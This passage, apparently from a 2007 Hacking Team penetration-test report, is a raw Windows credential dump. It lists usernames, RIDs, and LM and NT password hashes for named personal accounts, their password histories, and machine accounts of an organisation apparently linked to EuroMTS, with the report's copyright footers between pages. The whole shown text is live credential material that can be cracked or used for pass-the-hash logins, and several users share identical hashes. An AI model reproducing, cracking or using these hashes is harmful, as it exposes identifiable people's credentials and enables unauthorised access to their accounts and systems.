caitken_history_0:1373:078E9B46B166E989A0E92C13B3C69386:CF12C9BC7053868632D7815E63BAE8BE:::
caitken_history_1:1373:ED0745C4DA7FB9B89E0BEF86FF626B7F:87B0B7532A37115DD9A47BA646C76840:::
CAITKEN$:1375:EA160C0A4D438971DBD24597CE0BDB70:9A06680B801EE3D8FCB7516BF3E833E0:::
CAOMPAQSPARE$:1546:NO PASSWORD*********************:C22B732BB8E6A9AEBB5473B63CBFCB77:::
CAOMPAQSPARE$_history_0:1546:5A80BBD05A2F839EFBF3297FEE799759:F18BF31EB1D6FE34ED74991C70858691:::
CAROLINE$:1065:NO PASSWORD*********************:A0A7BD8F356BE12EAF01CEE39E80BBA6:::
CAROLINEW$:1624:NO PASSWORD*********************:6377FE8FFEE0F7ECE5799C6DD63CCC4D:::
cgordon:1238:23B3EFCAA559D0DBAAD3B435B51404EE:4057B60B514C5402DDE3D29A1845C366:::
chockley:1009:74295D64DFAFE68EAAD3B435B51404EE:9A887A333E06E267746CC40ECD0EE3B8:::
chockley_history_0:1009:4A40BE6EF8EA0AD1AAD3B435B51404EE:29BAE2F316A427810A4ECF41D4BC0452:::
chockley_history_1:1009:2B9B0F2B8AF6B7B45E153EE0AE0FFBAF:683688F93511C8D2A43A0FAEA832434E:::
CHOCKLEY$:1080:NO PASSWORD*********************:D3E469FAED6BC7BCDAAF3781EAAFA338:::
cmackain:1254:NO PASSWORD*********************:NO PASSWORD*********************:::
cmackain_history_0:1254:98B243DC240F6D21AAD3B435B51404EE:AEFADF1FFA93F264F38AA8D4BF9F7F51:::
cmackain_history_1:1254:C5D1F5C6EC4D3571AAD3B435B51404EE:6A8F99A24097BDB40EC9D15FECEEBC6D:::
CMACKAIN-2$:1258:NO PASSWORD*********************:DEFE64BF7A030EFAC4E03A613C1FC48D:::
CMURRAY$:1316:NO PASSWORD*********************:0C38999215420AF4BCF2363ABC05F5E7:::
COMPAQ4$:1285:NO PASSWORD*********************:F339A72D92BD4FD5490F09D0E4A27479:::
COMPAQEVO1$:1289:NO PASSWORD*********************:D30968A97D72ACEA3F5D24765D257BEF:::
COMPUTER-PKANAN$:1466:NO PASSWORD*********************:DE230ADFF8C9781D838471A3005B8D66:::
CONSTANCE$:1189:7B4FBA25E12CD8AC60697BBC38C836E9:1B6570B86452736CBC76DA8DDA2966AF:::
CONSTANCE$_history_0:1189:A4FCD221624B8EF75D857D6EDC55766E:1CE38145E03E822FEC10DB16A705FF1F:::
CONSTANCE$_history_1:1189:8EC4855E4BD402002F0005F0BDF4E81E:1BC9488860CA2F211A016761E509B2FE:::
CORDIAL1$:1194:NO PASSWORD*********************:E1E7F2E87625E2E572772DB7D363D385:::
CORDIAL2$:1195:NO PASSWORD*********************:E1088C212A16AFEE6599F83BCF556222:::
COREDEAL3$:1214:NO PASSWORD*********************:233278EB967580C17FA225EF4E67C5AF:::
cpietroluongo:1505:ED13D36113289F4AAAD3B435B51404EE:419100786DE93B377D5541EC6A93F758:::
cpietroluongo_history_0:1505:7E0474F607550467AAD3B435B51404EE:51A317466D4BC435309F1D6DFE4D0801:::
CPQEVO-C006F4$:1511:NO PASSWORD*********************:A15144889519BF974E31BC1D143367DE:::
csheeka:1577:NO PASSWORD*********************:NO PASSWORD*********************:::
csheeka_history_0:1577:E0379257570F13CCAAD3B435B51404EE:C599DF93C9F5AAFF726FB417B4B6F436:::
csheeka_history_1:1577:9F0E45256083D261C6EBE8776A153FEB:FC972DCC38373720B05923C729336881:::
cwohleber:1010:CCF970671FA1BB73A65CEC33BDA3B2C3:FB31E6CFC596434E1C687B28F47AACA5:::
cwohleber_history_0:1010:41E7044918F6B57BA202B0A0CC08E46E:702DD84576CFB68FF0B44FCBF1194DE2:::
cwohleber_history_1:1010:E17D116F0B9CB901AAD3B435B51404EE:EA4811D2230B8B9EA034A3D128FA4BA7:::
CWOHLEBER$:1107:NO PASSWORD*********************:2B7609AE157A27B6622F03B6D634C95C:::
CWOHLEBER$_history_0:1107:4A59488D2F93B8F065936CB302190818:9557CF1F275BF1A4200390F8E67FFC82:::
CWOHLEBER-EVO$:1417:NO PASSWORD*********************:6E2DB0FABF67521EE4B2C1BB2B28FBE6:::
CWOHLEBER-NEW$:1432:NO PASSWORD*********************:D7A99F7206648DBDCF059FE9E2E023C7:::
CWOHLEBER2$:1312:NO PASSWORD*********************:F626EA8CC0AE5644F4B05A5A465449A1:::
CWOHLEBER2$_history_0:1312:C5353E598F13CF228AC5FA8B6D515405:77F07A21C891E0D24273680F496A0F83:::
DEATHSTAR$:1272:NO PASSWORD*********************:078B4F82E6C11755B51D9DDC263D5043:::
DEATHSTAR$_history_0:1272:844541DE711AE90DFCB193DB27B6C5DF:BA0D26DE292AC22F72660FFFD65488DB:::
DEATHSTAR$_history_1:1272:C6FB1D010283EBAEA6595761D123B793:C4D3CA46399533E13B61958575695D1C:::
DELL_LAP$:1287:NO PASSWORD*********************:61D1D063D36726438BF53C7E977C29D2:::
DELL_LAP$_history_0:1287:09EEC8A0C547C1788148EB6427180C61:ECAD6196712917D6C0621FCB19AC2DA9:::
DEMO$:1059:NO PASSWORD*********************:A62AE0FBF054F483892E02A21A36B321:::
DEMO1$:1224:NO PASSWORD*********************:8508EC5E130ACB6A5E40004B089368EA:::
DEMO5$:1233:DDE90E0D11A98323608FFA2728988AD5:11A5400FC20A1B5C606A1DD2A228C9CC:::
DEMO6$:1235:C218870578BFCCD09E7318F9127A626B:5C8545D104C30117CA5FCE39176C8734:::
dgiannetti:1632:3EB444079EA04B5C95B909E7668E47E6:D01504143CDB3A40C030DDBCAFBB99E9:::
DIGRAZIA$:1218:NO PASSWORD*********************:1A591E1EF142571C2CCAD53FB43F1872:::
dmasella:1340:50A7FBCC381F992BAAD3B435B51404EE:C1E7241B26737BCC57DD5779958F03D5:::
dmasella_history_0:1340:8A486AE9D9137B58AAD3B435B51404EE:313BAC41ACB21CE6A3A766E1BD2C5FCB:::
ecaloia:1026:NO PASSWORD*********************:NO PASSWORD*********************:::
ECALOIA$:1252:228B567FB9B3465BAAD3B435B51404EE:E381FD05B9C978F74C96BFC9FFF305FC:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 160 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ECALOIA-2$:1203:NO PASSWORD*********************:BAB80F6FAEDC44074A0309AC546F044A:::
ECALOIA-2$_history_0:1203:7E7D039285C37A8313D4EBB63D9D61B2:E1147F550A734A608F7BE1A457B98BFC:::
ECALOIA-BX6181N$:1251:NO PASSWORD*********************:13815DDDEC33818D0C1D6C82E62136F1:::
edimech:1392:7C95F2C6D000815EAAD3B435B51404EE:814D50F8742888E0A8E350EF99F34630:::
edimech_history_0:1392:FEEB7FC6CAB1FD50AAD3B435B51404EE:A637786B4F8252DDB27BD28E3FE58907:::
edimech_history_1:1392:2CC6C3CAC663E72F6B62A32E0013F900:038EDC96AA1295BD1C84B8BBF6C754B1:::
EDIMECH$:1391:NO PASSWORD*********************:0A05B02F6907B88EF8E5F32F9AEE4E1A:::
ejones:1599:NO PASSWORD*********************:NO PASSWORD*********************:::
ejones_history_0:1599:456AF0836F39DB97AAD3B435B51404EE:A01C686FD2D82DE1A7AB0945169F0D5E:::
ejones_history_1:1599:456AF0836F39DB97AAD3B435B51404EE:A01C686FD2D82DE1A7AB0945169F0D5E:::
EJONES$:1517:NO PASSWORD*********************:B87C816A3AE162CB6FC163F32C670F86:::
EJONES$_history_0:1517:85D86E468AB142F5E7C8DE7A6C1BE5AE:DCA808AF5AED63662290DF1C448BD1B1:::
EMMATAPLIN$:1497:NO PASSWORD*********************:C04727E6C8AC6D0646D9C531B8954E9A:::
ENDOR$:1300:NO PASSWORD*********************:6D785B9F2358D205B1BD19443E7C7F82:::
etaplin:1248:NO PASSWORD*********************:NO PASSWORD*********************:::
etaplin_history_0:1248:54CCEB951AC10611EE54FAA22441F8AD:4A8462ACB1B8F6C83F8D7752E843D0C4:::
etaplin_history_1:1248:54CCEB951AC106115394A3E8CE121DCA:BF4CE0AD581497DB4A17A6C171FC7417:::
ETAPLIN$:1247:NO PASSWORD*********************:A6C3A75C112120DCCCEDD3A56536F670:::
EUREXWKS01$:1589:2CEF5F633F449072F6EED1878ACE87DA:EECED8F0EE5DFA05A97C0C939032AD9D:::
EUREXWKS01$_history_0:1589:F837749C1A1FBB019C90B908C41A9D16:48C76A3AAAF533D3AB176DFB027D501D:::
EURO-MTS$:1362:NO PASSWORD*********************:BE93051130D0B28A0964F9408755FFB1:::
EURO-MTS$_history_0:1362:7B4A48F5B643D512AAD3B435B51404EE:468F914EEEC4DD07BB4922DB7E0B6934:::
EURO-MTS02$:1335:NO PASSWORD*********************:1460C61B6985E386C6FD56592EB90EFE:::
EURO-MTS02$_history_0:1335:A529C2D926D332728D00E79621B235C6:0E36DEE193B1D293AFF61D9E6E62D225:::
EURO-MTS02$_history_1:1335:A529C2D926D332728D00E79621B235C6:0E36DEE193B1D293AFF61D9E6E62D225:::
EURO-MTS03$:1309:NO PASSWORD*********************:1F800F320672CF6627FFC8212692D7CD:::
EURO-MTSBDC$:1079:NO PASSWORD*********************:DC343A9D410A2562BE20746433DE6684:::
EURO-MTSHELP$:1066:NO PASSWORD*********************:EFD1BF0EED63BAE03632CE0B19429124:::
EUROLAP$:1187:NO PASSWORD*********************:E01BEE22594DC8F5784F73D77CBD0898:::
EUROMTS-2A8AA56$:1535:6F2422AA2EC5A6ECABF746FADE80CCAB:6102ED6EFAFC383951ABE4C182821012:::
EUROMTS-2A8AA56$_history_0:1535:1DD5D31583097A666F0B2D3822F980F5:D95EA7234C2F42D0144951A5CF0A8F6F:::
EUROMTS-EIISFY8$:1555:0DAD55A119431DFA2C82F9091368E065:E70100C33631C5D1D5A5E704C2B48B5C:::
EUROMTS-EXG$:1277:NO PASSWORD*********************:80F24DA21DB5D830C2DC02C55EB1794D:::
EVO-3$:1297:NO PASSWORD*********************:32A3EAA76A5F65AF43383AAEB9CBD6C0:::
EVO4$:1305:NO PASSWORD*********************:63C7FCD6FA00FC284BE4B63DE43AEAF3:::
fabiana:1543:7A9AA2028F25FD20E9ACC06E851F6F1E:20678113738391DE003CA4FC8B5CADC8:::
fabiana_history_0:1543:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
FABRIZIO$:1053:NO PASSWORD*********************:FB90C5C71ECCFF141930BE82B0B390AD:::
FABRIZIOT$:1626:NO PASSWORD*********************:7F50A0541F0607F05E4503089BF2D6EF:::
fbruni2:1152:00088CCA4FEA4070E68AA26A841A86FA:A7D5D0AAAB9B12D47B7ACB2D9428CC83:::
fbruni2_history_0:1152:B9B5874C164E1C56D14B39FC642E3120:67FC86631C1E25A9844D5A1959B8A17E:::
fbruni2_history_1:1152:B9B5874C164E1C56D14B39FC642E3120:67FC86631C1E25A9844D5A1959B8A17E:::
fcampanella:1461:7A9AA2028F25FD20E9ACC06E851F6F1E:FF708F4F49D48B24A3BE5F307DFBBE60:::
fcampanella_history_0:1461:1CE95AC0EA77562DE9ACC06E851F6F1E:4FF4E4DFE093CB50A74609289734C538:::
fcampanella_history_1:1461:52D127453B624FB817D7CF00474E745A:49D63BBE5562980E545C4464F0F54FC0:::
fcazzulini:1351:951D423CEAD71BF2E68AA26A841A86FA:334FBFC289680C526324AF5CF43C6753:::
fmargini:1031:NO PASSWORD*********************:NO PASSWORD*********************:::
fmargini_history_0:1031:5E00A9163EE37C821D71060D896B7A46:33BB9097CB56BF9B5241937A896D7A6B:::
fmargini_history_1:1031:5E00A9163EE37C82C2265B23734E0DAC:0A364FC94C31FD642BB5755647517602:::
FMARGINI$:1348:NO PASSWORD*********************:60A3691B0EDAD1B2A84D512DD6A7AAD5:::
FMARGINI-R100$:1470:NO PASSWORD*********************:D10975C07B174CF38919436268A0F33B:::
fpozzi:1397:12CDA4C7D498A966AAD3B435B51404EE:718EC2464BEDC0AA1F7BB28D91B31DD3:::
FRANCESCO$:1057:NO PASSWORD*********************:8E54BD2BA4E45FAC687DD06FE79492B2:::
ftesta:1035:951D423CEAD71BF2E68AA26A841A86FA:334FBFC289680C526324AF5CF43C6753:::
ftesta_history_0:1035:F1BA1F4A88E35342AAD3B435B51404EE:7FE2231C07121E74A24F8532E26CF0FE:::
ftesta_history_1:1035:0624DCC29E8C26CCAAD3B435B51404EE:6F2307D82FA3C6C0A835C3EF4506E8FD:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 161 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
FTESTA$:1135:NO PASSWORD*********************:60DFCB471B4E07F4774B5CE1C7FA9FBB:::
FTESTA-MOBILE$:1402:NO PASSWORD*********************:A19E7310D880F0F6264C4E1C9094C56B:::
FTESTA2$:1559:NO PASSWORD*********************:152B3D53AB163C008999A10E6AE31972:::
G58210J$:1193:NO PASSWORD*********************:D6157A6E10779CC37285B5C6DDE093DD:::
gbasevi:1143:AEBD4DE384C7EC43AAD3B435B51404EE:7A21990FCD3D759941E45C490F143D5F:::
gberta:1641:NO PASSWORD*********************:NO PASSWORD*********************:::
GBRIAN$:1307:NO PASSWORD*********************:2E7406AC726C148363B482AD300C92FD:::
gegidi:1458:B32F62A9281C56C7AAD3B435B51404EE:96EFBE029527B96752B250824E1D1C7A:::
gegidi_history_0:1458:18502211A8412E5CAAD3B435B51404EE:B8ABEFABF6DD1D5DBCF91617BD14E910:::
gegidi_history_1:1458:E974D02472809498B09321E47427AF3C:F5D5B37575B588FFB96363E29BFD7AD1:::
ggalassi:1442:NO PASSWORD*********************:NO PASSWORD*********************:::
ggalassi_history_0:1442:44B818CA8FB5B0BDAAD3B435B51404EE:6B396AF3FAAC36666909D1741510383C:::
ggalassi_history_1:1442:043518922774DD81AAD3B435B51404EE:B461FCF0FD5966AE7F4191063948B882:::
GGALASSI$:1441:NO PASSWORD*********************:25FEC7179FA01968E90DC72EFD83A978:::
ggarbi:1071:67327FCD6A951883AAD3B435B51404EE:EBA96BED5284F35E1DE2BCD536D65D7C:::
GOBRIEN$:1293:NO PASSWORD*********************:BA86AF7B6BD53C61F6BB9B61FDF38DB2:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
guest2:1633:641FBB3BD061F433AAD3B435B51404EE:A79C66F5AC1E1BD15A52067FCB1071A0:::
GUIDOGALASSI$:1480:NO PASSWORD*********************:6E2D86144A088881BA7D064A669032ED:::
GUIDOGALASSI$_history_0:1480:A1C5E2A7DBB1A65EFF24A708D71311A8:36943C1B3F83E8D974C9A502F80EAC7F:::
gvaciago:1604:NO PASSWORD*********************:NO PASSWORD*********************:::
gvaciago_history_0:1604:CBCBAAD920D2001D278685E505C3066D:0C4FF1523F14904BEEDC1E5B9FCD9AA0:::
gvaciago_history_1:1604:0624DCC29E8C26CCAAD3B435B51404EE:6F2307D82FA3C6C0A835C3EF4506E8FD:::
GVACIAGO$:1603:NO PASSWORD*********************:A1676E0DBF21D41FF7B484A1284AC1DE:::
GVACIAGO$_history_0:1603:E6FBF29EA08538F4093FA96A3DE2B80A:CAB0BA99360CE876A6A9A4265573A3D5:::
hmaatugh:1415:9992397E1BEE49366D4FB70130C0CB80:20A91290D9D9FCF4CED3CE208F5E7393:::
hmaatugh_history_0:1415:0E42168BFA53BF62AAD3B435B51404EE:26ADD0D1EBBD1AC57CDAEC49C4DF769F:::
hmaatugh_history_1:1415:F78546FB49FDC3DEAAD3B435B51404EE:5B6999FDBDF0B3E8B72A2954CF371048:::
HP13438529521$:1482:D3500222C430A1614871AF6E78CB76FD:CE4705CB6BC1B18EA8EDE2848E595EB0:::
HPBRIO-1$:1128:NO PASSWORD*********************:1022E798143DE414B95CF389D50597D4:::
HPBRIO-3$:1100:NO PASSWORD*********************:3590827700285DB894F83C52633ED59D:::
HPBRIOTECH$:1109:NO PASSWORD*********************:690840C5883DB9C7CE779266DD8F6FA9:::
JANE$:1047:NO PASSWORD*********************:60ABF5F2F7DE8651F8786B0DD4027802:::
JANESAWYER$:1484:NO PASSWORD*********************:10360D225835F9A00329D43D04F49F30:::
JANESAWYER$_history_0:1484:5F60AA8D3960CA95B77D2F53588BB655:242C254426186F6E557079BA47396723:::
jbeenders:1579:NO PASSWORD*********************:NO PASSWORD*********************:::
jbeenders_history_0:1579:40476CA2FD24A232AAD3B435B51404EE:D5243F8101A4B24955C0982690FEF8A5:::
jbeenders_history_1:1579:40476CA2FD24A232FF928058B4CAC2C2:B87D335608A80EC910DDCA79E58015B6:::
JBEENDERS$:1530:57E6355031604648B61CE62632348722:A43F2050DB3C254CEE06F223BEC94514:::
JBEENDERS$_history_0:1530:C5102737ECFB966C4ABB390F4A80FF34:42BFB0311EC0ABAA155997583595BD80:::
jbeenders2:1472:3AD6D57BFCF66CB89C5014AE4718A7EE:F7E3E07224838724AF72833ABF54EC22:::
jbeenders2_history_0:1472:3AD6D57BFCF66CB8FF17365FAF1FFE89:AD2947188CE94C8EC1FF861A401E2635:::
jbeenders2_history_1:1472:3AD6D57BFCF66CB81AA818381E4E281B:2F7B577D983C39C43026561C24F31792:::
JDAVIES$:1081:NO PASSWORD*********************:261FB2AEF725BDDDBC5FC62021406170:::
jgeorge:1255:NO PASSWORD*********************:NO PASSWORD*********************:::
jgeorge_history_0:1255:E06C04D55ADFBDBEAAD3B435B51404EE:9C5EED9F91800F4F161907AB1D9E6B2F:::
jgeorge_history_1:1255:283EE2F2BBBDB1CAA8F66FCF3B8B92E2:88E11E7C9984DF8534953EB14583D671:::
JGEORGE$:1487:NO PASSWORD*********************:C5A26BBB3F2DA8967423555B4B60BD2A:::
JGEORGE$_history_0:1487:244E2CBD79DEBAA8B89A5F4A2FE8E4D0:88C141094417C6EA3C6AD71946DA5185:::
jsawyer:1032:59407316588FA11BAAD3B435B51404EE:54E4DD356A05121EE2A8E4ACDD506F07:::
jsawyer_history_0:1032:71D9689FEDAE76E0AAD3B435B51404EE:5E74C9D14AE11C92CEC463BB3C23F743:::
jsawyer_history_1:1032:11552272AE60FDB6AAD3B435B51404EE:AA3C73F5989FD7C596356779E5E8CE6C:::
jschaefer:1435:D07EC69970C714F7AAD3B435B51404EE:98DBFF6FD471347FEFCAD5DEFF458F42:::
jschaefer_history_0:1435:21976E295F47A39A9E734F6C7F0E90D3:7A42A3C99F262B1E71CECB3796C7D050:::
jschaefer_history_1:1435:367609D22010C2E3AAD3B435B51404EE:FA28E17784F3F6BD32F98D18599EDAE5:::
jwinslade:1421:4B57DD4D4BDF6A91E72C57EF50F76A05:02271274442763804FAC2475803C707E:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 162 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
jwinslade_history_0:1421:8A51D052D7852075AAD3B435B51404EE:DA29CE72A5CC4E9C0331AA5BC6EFA4DA:::
jwinslade_history_1:1421:2D269AFD28FC0984AAD3B435B51404EE:8C1CDF7E30A8414FE4E8A8A73F69A73B:::
KOKANLAW$:1242:NO PASSWORD*********************:17C9ECBB77FF4C54E0A04729BA6CBD5C:::
ksommer:1236:A0C0597E3D881480AAD3B435B51404EE:222215C8ADE6A435DD120D2BA68DD6B8:::
ksommer_history_0:1236:70EDF8511B6C4F01FDEEBD23EC791723:991BA2136D25088358AD4F8359FF9BE5:::
LATITUDE-1$:1408:NO PASSWORD*********************:BFBC64B97380C59C5526A06FF38C4E4A:::
LATITUDE-2$:1266:NO PASSWORD*********************:4C8A4B5EB69A6BDB34D546020FC5364E:::
LATITUDE-2$_history_0:1266:F383E7F31239F14189CD58846020EA7B:4556ADA8F750D7C026AB5142837B8671:::
LAURENT$:1126:NO PASSWORD*********************:8C2D507DC9CC9B0D63CBC19DED557589:::
LAURENT-LAPTOP$:1302:NO PASSWORD*********************:031DBD09EFD2E9FA2AD0AEE3D6A4A6CE:::
LAURENTNEWLAP$:1508:NO PASSWORD*********************:CEE03CB32CCC30EDD8FD1804D918113B:::
lbaratta:1518:645AD9A2AB7616CFAAD3B435B51404EE:427D2C757F5FC347EA72ABCBAD1302D9:::
lbaratta_history_0:1518:81079ABBB16A837CC2265B23734E0DAC:2D7C64B089CFFB41960CE56E29BC8BD9:::
lgrandini:1574:05E23C6126B1E9FEBE5C79B9E1006584:E25ED123C656D0C5F5C7C97BCF6A9EC7:::
lmeneghesso:1320:9D5454D7A4F511E1AAD3B435B51404EE:044E7AE1C6E092FFC61EF713C89E4622:::
lmeneghesso_history_0:1320:822A47D38DB69754543CA069A1480A06:6DF94DC4D57CF4502C5C209ACE01C61E:::
lmeneghesso_history_1:1320:A264AEF1FD3C668F93E28745B8BF4BA6:1E04791BDECBFF095DFCD51772E63ABF:::
LOBA01$:1464:A52F69E103DB21DFAAD3B435B51404EE:CA659FEC455B284F13CDB20BD77F391C:::
LON0063$:1569:NO PASSWORD*********************:B970EC11D7390555B92DFBE097FE667D:::
LON0063$_history_0:1569:C459D3840E02356FA5570AC422BFF90E:E848A177AF3C90DA5F6B3E5DB91E684E:::
LONBG01$:1528:NO PASSWORD*********************:F228532822EFB1A74E1AEDCB2654D8E5:::
LONBK01$:1361:NO PASSWORD*********************:A37A72E46FB8FE077E11A00EFE496CB2:::
LONBK01$_history_0:1361:C5EF01C237760B492BADD3A2942BBD47:68C1D34BDA23D695B0D42DD41385148B:::
lonbloomberg:1500:333CB006680FAF0A27BCBF149915A329:318FC4D181C864777F2C1B07596A5EA9:::
lonbloomberg_history_0:1500:131699E51717E3E6877D8C5FF319F4AF:0EE35B6D958A8C833DA3E215314A385E:::
lonbloomberg_history_1:1500:88470411055D13A2877D8C5FF319F4AF:30E8BE3697682302DCA9595E37599F4A:::
lonreuters:1381:333CB006680FAF0A27BCBF149915A329:318FC4D181C864777F2C1B07596A5EA9:::
lonreuters_history_0:1381:9A56CCA5C2E79AE0AAD3B435B51404EE:73E40AED05219B65C0259D593D9021B7:::
lonreuters_history_1:1381:36542C3BA0C0DC6CAAD3B435B51404EE:B8415CD2284C6F61625DFDD4BDBC93BD:::
LONRU01$:1533:NO PASSWORD*********************:740747233DC07E98F2BDC636E012F6D2:::
LONSPARELAP$:1584:92CDFB9E41A76FAE7F2C23DC7890F189:83EF70FAA1639660556AA661E06E0B3C:::
LONWINTS01$:1548:NO PASSWORD*********************:BC23A610CECBCD2259827344E220D42B:::
LORAS01$:1291:CD1C1132CE1D76E919EF409674E6743F:340F77CA9898EDC309F85121BE738863:::
lredgwell:1439:C37E1E35315186ABC2265B23734E0DAC:A5A6894ED752E3E56DFB25668C479924:::
lredgwell_history_0:1439:C37E1E35315186ABAAD3B435B51404EE:3D83E48C0D8F1773B92526F1D6F3644D:::
lredgwell_history_1:1439:C37E1E35315186ABAAD3B435B51404EE:3D83E48C0D8F1773B92526F1D6F3644D:::
LREDGWELL$:1450:NO PASSWORD*********************:EEC7B1D3FF46FCCA8898D029581D1644:::
LREGWELL$:1448:540BD067C418CF9CA1D995E384D38A72:2EBE22EF6346D1ACC3788EC305E4CC21:::
lviteau:1039:NO PASSWORD*********************:NO PASSWORD*********************:::
MACKAIN$:1610:NO PASSWORD*********************:74B0FCC09D39E705159ED9C485C96E5C:::
MANU$:1051:NO PASSWORD*********************:E04917A32D2EB4D88C4EC6719B40BB86:::
MANUTECRA$:1628:NO PASSWORD*********************:080AFC527972A20274822CCF3F970571:::
marie-helene:1563:D8664E71BB1CF3C8C2265B23734E0DAC:A03D323BE0F6EA8604B84921F1763903:::
marie-helene_history_0:1563:D8664E71BB1CF3C8C2265B23734E0DAC:A03D323BE0F6EA8604B84921F1763903:::
marie-helene_history_1:1563:861B14B9BCAE0B66AAD3B435B51404EE:D1CBB04898B5AF2D7BEB0D0D3EBEDD0B:::
MARIO$:1122:NO PASSWORD*********************:998C83434FFFD0A9AD742406A5F53FB2:::
MARIO1$:1123:NO PASSWORD*********************:A236A28099349F9FE1956B00ACA837C4:::
MARKAUSTIN$:1620:NO PASSWORD*********************:488DBF70AD8A80DABB4170D6E7A82AD8:::
MARKAUSTIN$_history_0:1620:3144B3FD8F45F90A82273D7E512FCD4D:60392FB3373C8EAFBE4DD04299F7B4FB:::
mausten:1121:45ADFCB1F62CA223AAD3B435B51404EE:504F0869C852EBED40E4CC5AF2EB0A73:::
MAUSTEN$:1127:NO PASSWORD*********************:D5C3C42CFAA69639AEC4292B12E63AE7:::
MAUSTEN_LAP$:1262:NO PASSWORD*********************:FC1C22B6FFC6AAB5B6C41D2A2F109AE3:::
mbiazzo:1352:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
mbiazzo_history_0:1352:D68B15077E0E3D44CC58DD87B7FEE1A9:DF66235E7623D547284414A0B362ADEB:::
mbiazzo_history_1:1352:78B4BB855D3B00BD09752A3293831D17:5B5523A8010F4C50BC9A28461BC88F35:::
mceballos:1137:45ADFCB1F62CA223AAD3B435B51404EE:504F0869C852EBED40E4CC5AF2EB0A73:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 163 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MCEBALLOS$:1140:NO PASSWORD*********************:23BA9F33F05D7AC3C92EC423C23E29CA:::
mcretu:1515:3EF9B218DB71C11309752A3293831D17:2F6AB0AE90BB7CBABC6BB00A9F60C743:::
mcretu_history_0:1515:E9D70995BE4C83D3AAD3B435B51404EE:944D0F96B8B42FD447707529652A8498:::
mcronin:1178:1EEE38752A2D7A3AAAD3B435B51404EE:C0E05EFEBC2FC3A221A26FB85C5695CE:::
MCRONIN$:1179:NO PASSWORD*********************:281DA8A3068B600FE1B57DE2B1E54308:::
MICHELA$:1419:NO PASSWORD*********************:44752C0E14BAA8AF21F6B6260DDCE908:::
mmaertens:1596:D540B9F44A6A7E45AAD3B435B51404EE:258DDD0FDC537D839C337D6FB8167BD0:::
MMAERTENS$:1592:0372628B1DF14463A8CFA3A00C6F4A1D:20CDD3B852C8DFB7749E62B7D1703726:::
mnapoletano:1025:B9CF7AFCE9DDE25D7C3113B4A1A5E3A0:F9DD0C720AD7942D81712C16CA967AD6:::
mnapoletano_history_0:1025:4BF342EED0A31DEBAAD3B435B51404EE:1E7FDF2F41B9EFC9B038B78488E6ECA1:::
mnapoletano_history_1:1025:4BF342EED0A31DEBAAD3B435B51404EE:1E7FDF2F41B9EFC9B038B78488E6ECA1:::
mpecchi:1133:0DF2808004523D0EAAD3B435B51404EE:2DDF3CB738D7C5CCCDC882E7459575D1:::
mpecchi_history_0:1133:0FAD3B2BCFB21948AAD3B435B51404EE:F6FFA2403FA464595517B90982CD3725:::
mpecchi_history_1:1133:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
MRCPROD$:1118:NO PASSWORD*********************:2A738B17C5BF7CBE2223E33D9D055158:::
mroshandel:1476:367609D22010C2E3AAD3B435B51404EE:FA28E17784F3F6BD32F98D18599EDAE5:::
mroshandel_history_0:1476:0624DCC29E8C26CCAAD3B435B51404EE:6F2307D82FA3C6C0A835C3EF4506E8FD:::
mroshandel_history_1:1476:3C332A00DA63FED3AAD3B435B51404EE:EE2D9A6898440E59D196C9E4CE9EF626:::
msavoia:1387:640C0C8D6404E2DCAAD3B435B51404EE:05ADCD4BC3BFB6FE44D089289817E30C:::
msavoia_history_0:1387:F8927C0EE84C60EF1E929FFC01395127:2F132ED37A093B3947797706F5FD8601:::
msavoia_history_1:1387:8626CF679EA5B0FCE917F8D6FA472D2C:C350284A16AD5422CF79C479D0FA1D6C:::
mspongano:1034:0DB660559937EA0FAAD3B435B51404EE:0A0794DA02590A53C131DDBE18862A91:::
MTC$:1099:1A54C511DEE1DB5DAAD3B435B51404EE:40F8FDEF03214AFC124C635DD514C590:::
MTS-DEMO-2$:1622:52567B8F77C9968BAF5F62C21A52B890:2E0072521510C6630CF31B9B69FAB3C1:::
MTS-DEMO-2$_history_0:1622:F7C61DBE4510E23081D671A7B69D74A3:DA8EB0ABAFEAC15A4E6B593490946216:::
MTS-HELP$:1176:NO PASSWORD*********************:E8D8AB97320D9D2ABF8B8DC6AD6AA5BC:::
mtshd:1631:B1A9A1301CD7AEA9C482C03F54CDB5D9:3ACBE67F628DF8969E2E99CB1FA4B5A1:::
mtshd_history_0:1631:F8F099E4061AF071C482C03F54CDB5D9:61B508A1B8601D793982105E9D320006:::
mvilla:1393:DB350926A5BD2770AAD3B435B51404EE:DA1CC136E8FDA9BC1F8259A3FF0839D4:::
mvilla_history_0:1393:BF57AAC490A0495C9C5014AE4718A7EE:858E15998C49DD8413A0B39DEF8EAFF7:::
mvilla_history_1:1393:BF57AAC490A0495C9C5014AE4718A7EE:858E15998C49DD8413A0B39DEF8EAFF7:::
mvlad:1471:23B3EFCAA559D0DBAAD3B435B51404EE:4057B60B514C5402DDE3D29A1845C366:::
mvlad_history_0:1471:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
mwieacker:1522:4CD6B86ABD2A0CACAAD3B435B51404EE:88F6960EF562BD28DA8CE14E0D8B7F1B:::
mwieacker_history_0:1522:B80889E07FAF107BAAD3B435B51404EE:114BE0D6F429C21C8EFC4F862F33620F:::
